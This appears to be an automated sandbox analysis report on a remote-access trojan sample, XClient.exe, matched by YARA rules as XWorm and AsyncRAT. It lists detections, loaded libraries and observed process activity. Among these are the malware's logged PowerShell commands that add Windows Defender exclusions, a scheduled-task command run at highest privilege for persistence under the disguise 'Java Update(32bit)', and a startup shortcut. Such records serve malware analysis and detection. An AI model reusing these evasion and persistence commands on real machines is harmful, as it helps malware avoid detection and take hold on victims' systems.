Source: XClient.exe, XLogger.cs	.Net Code: KeyboardLayout
Source: Java Update(32bit).exe.0.dr, XLogger.cs	.Net Code: KeyboardLayout

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\XClient.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: XClient.exe, type: SAMPLE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: XClient.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.XClient.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.0.XClient.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1674357951.0000000000E22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\Java Update(32bit).exe, type: DROPPED	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\ProgramData\Java Update(32bit).exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\XClient.exe	Code function: 0_2_00007FFD9B871F41	0_2_00007FFD9B871F41
Source: C:\Users\user\Desktop\XClient.exe	Code function: 0_2_00007FFD9B876A6C	0_2_00007FFD9B876A6C
Source: C:\Users\user\Desktop\XClient.exe	Code function: 0_2_00007FFD9B87155F	0_2_00007FFD9B87155F
Source: C:\Users\user\Desktop\XClient.exe	Code function: 0_2_00007FFD9B875CBC	0_2_00007FFD9B875CBC
Source: C:\Users\user\Desktop\XClient.exe	Code function: 0_2_00007FFD9B871CA1	0_2_00007FFD9B871CA1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B9430E9	4_2_00007FFD9B9430E9
Source: C:\ProgramData\Java Update(32bit).exe	Code function: 15_2_00007FFD9B89155E	15_2_00007FFD9B89155E
Source: C:\ProgramData\Java Update(32bit).exe	Code function: 15_2_00007FFD9B891CA1	15_2_00007FFD9B891CA1
Source: C:\ProgramData\Java Update(32bit).exe	Code function: 16_2_00007FFD9B8A155E	16_2_00007FFD9B8A155E
Source: C:\ProgramData\Java Update(32bit).exe	Code function: 16_2_00007FFD9B8A1CA1	16_2_00007FFD9B8A1CA1
Source: C:\ProgramData\Java Update(32bit).exe	Code function: 17_2_00007FFD9B8B155E	17_2_00007FFD9B8B155E
Source: C:\ProgramData\Java Update(32bit).exe	Code function: 17_2_00007FFD9B8B1CA1	17_2_00007FFD9B8B1CA1
Source: C:\ProgramData\Java Update(32bit).exe	Code function: 18_2_00007FFD9B8A155E	18_2_00007FFD9B8A155E
Source: C:\ProgramData\Java Update(32bit).exe	Code function: 18_2_00007FFD9B8A1CA1	18_2_00007FFD9B8A1CA1
Source: C:\ProgramData\Java Update(32bit).exe	Code function: 20_2_00007FFD9B88155E	20_2_00007FFD9B88155E

Source: XClient.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: XClient.exe, type: SAMPLE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: XClient.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.XClient.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.0.XClient.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1674357951.0000000000E22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\Java Update(32bit).exe, type: DROPPED	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\ProgramData\Java Update(32bit).exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: XClient.exe, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Java Update(32bit).exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Java Update(32bit).exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Java Update(32bit).exe.0.dr, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: Java Update(32bit).exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Java Update(32bit).exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: XClient.exe, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: XClient.exe, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/21@1/2

Source: C:\Users\user\Desktop\XClient.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update(32bit).lnk

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
Source: C:\ProgramData\Java Update(32bit).exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:824:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
Source: C:\Users\user\Desktop\XClient.exe	Mutant created: \Sessions\1\BaseNamedObjects\N8UxQtPS61Z7lofo

Source: C:\Users\user\Desktop\XClient.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: XClient.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: XClient.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\XClient.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\XClient.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: XClient.exe

ReversingLabs: Detection: 84%

Source: C:\Users\user\Desktop\XClient.exe

File read: C:\Users\user\Desktop\XClient.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\XClient.exe "C:\Users\user\Desktop\XClient.exe"
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update(32bit).exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update(32bit).exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Java Update(32bit)" /tr "C:\ProgramData\Java Update(32bit).exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\Java Update(32bit).exe "C:\ProgramData\Java Update(32bit).exe"
Source: unknown	Process created: C:\ProgramData\Java Update(32bit).exe "C:\ProgramData\Java Update(32bit).exe"
Source: unknown	Process created: C:\ProgramData\Java Update(32bit).exe "C:\ProgramData\Java Update(32bit).exe"
Source: unknown	Process created: C:\ProgramData\Java Update(32bit).exe "C:\ProgramData\Java Update(32bit).exe"
Source: unknown	Process created: C:\ProgramData\Java Update(32bit).exe "C:\ProgramData\Java Update(32bit).exe"
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update(32bit).exe'	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update(32bit).exe'	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Java Update(32bit)" /tr "C:\ProgramData\Java Update(32bit).exe"	Jump to behavior

Source: C:\Users\user\Desktop\XClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\XClient.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
